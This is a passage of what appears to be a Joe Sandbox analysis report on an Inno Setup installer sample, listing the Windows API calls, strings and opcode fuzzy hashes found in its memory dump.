                                                                                            • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                            APIs
                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                            • TranslateMessage.USER32(?), ref: 0042448F
                                                                                            • DispatchMessageA.USER32(?), ref: 00424499
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 4217535847-0
                                                                                            • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                            • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                            APIs
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Prop$Window
                                                                                            • String ID:
                                                                                            • API String ID: 3363284559-0
                                                                                            • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                            • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3234591441-0
                                                                                            • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                            • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: PrepareToInstall
                                                                                            • API String ID: 2558294473-1101760603
                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /:*?"<>|
                                                                                            • API String ID: 0-4078764451
                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: InitializeWizard
                                                                                            • API String ID: 2558294473-2356795471
                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 47109696-1019749484
                                                                                            • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                            • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                            Strings
                                                                                            • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: Inno Setup: Setup Version
                                                                                            • API String ID: 3702945584-4166306022
                                                                                            • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                            • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: NoModify
                                                                                            • API String ID: 3702945584-1699962838
                                                                                            • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                            • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                              • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                              • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                              • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                            • SendNotifyMessageA.USER32(0001042E,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                            • String ID:
                                                                                            • API String ID: 2649214853-0
                                                                                            • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                            • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                              • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMetricsMultiSystemWide
                                                                                            • String ID: /G
                                                                                            • API String ID: 224039744-2088674125
                                                                                            • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                            • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                            APIs
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                            • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum
                                                                                            • String ID:
                                                                                            • API String ID: 2818636725-0
                                                                                            • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                            • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                            APIs
                                                                                              • Part of subcall function 00495508: GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 00495508: SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                              • Part of subcall function 00495508: GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                              • Part of subcall function 00495508: GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                              • Part of subcall function 00495508: ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            • MulDiv.KERNEL32(?,?,00000006), ref: 00495AFB
                                                                                            • MulDiv.KERNEL32(?,?,0000000D), ref: 00495B10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                                                            • String ID:
                                                                                            • API String ID: 844173074-0
                                                                                            • Opcode ID: 0ae29da0906a83ea8dd71af8a3b995980c0d8de00cfc8428832f083f9a8e0037
                                                                                            • Instruction ID: abe69acf9078cd54ec5aa8dad2b6463f40ee800cf76dae291ad797c0d2ca63cb
                                                                                            • Opcode Fuzzy Hash: 0ae29da0906a83ea8dd71af8a3b995980c0d8de00cfc8428832f083f9a8e0037
                                                                                            • Instruction Fuzzy Hash: FC21D6713012009FDB50DF69C8C5AA637E9EB89314F6446B9FD08CF29ADB35EC058B65
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2919029540-0
                                                                                            • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                            • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindFree
                                                                                            • String ID:
                                                                                            • API String ID: 4097029671-0
                                                                                            • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                            • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                            • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentEnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2396873506-0
                                                                                            • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                            • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                            APIs
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
